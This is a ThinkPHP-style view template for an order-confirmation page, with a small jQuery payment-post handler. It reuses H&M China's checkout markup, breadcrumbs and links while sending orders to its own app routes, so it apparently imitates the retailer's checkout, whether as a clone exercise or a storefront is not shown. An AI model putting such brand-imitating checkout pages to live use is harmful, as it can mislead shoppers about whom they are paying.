<extend name="Base:base" />
<block name="main">
<main role="main" class="">
			<div class="wrapper">    
				<nav class="breadcrumbs">
					<ul>
	<li>
	
	
	
		<a href="https://www2.hm.com/zh_cn/">HM.COM</a>
	</li>

	<li class="">

			<a href="https://www2.hm.com/zh_cn/payment/orderPayment/54365404#" onclick="return false;"> 结账</a>
				</li>
	<li class="active">

			<a href="https://www2.hm.com/zh_cn/payment/orderPayment/54365404#" onclick="return false;"> 结账</a>
				</li>
	</ul>
</nav>
				

<header class="checkout-header">
		<h1>结账</h1>
		<ul class="checkout-breadcrumbs items-4 clearfix">
	<li class="item">1. 登录</li>
	<li class="item">2. 发货 &amp; 支付</li>
	<li class="item ">3. 确认订单</li>
	<li class="item item-current">4. 非常感谢</li>
	</ul></header>
	<div class="row ng-scope" ng-controller="PaymentController as paymentCtrl">
	<article class="search-autocorrect  zero-results">
                   <h1>非常感谢，您包裹正在安排配送！
                   </h1>
                   <div class="search-autocorrect-copy">
                       <p><a href="__APP__/Home/Index/index">继续购物>></a></p>
                   </div>
               </article>

		
</div>
		</main>

	<script>
		$('#checkoutViewPaymentButton').click(function () {
			$('.js-payment-loader').css('display', 'block');

			$.post(
				'__APP__/Home/Order/pay',
				{
					oid:{$orderData.id}
				},
				function (data) {
					if (data == 2) {
						$('.js-payment-loader').children().children().find('h2').text('支付被拒绝');
						$('.js-payment-loader').children().children().find('p').text('当前无法处理您的订单。请刷新页面并重试。');
					} else {
						location.href = '__APP__/Home/Order/thinkYou';
					}
				},
				'json'
			);

			return false;
		});
	</script>
</block>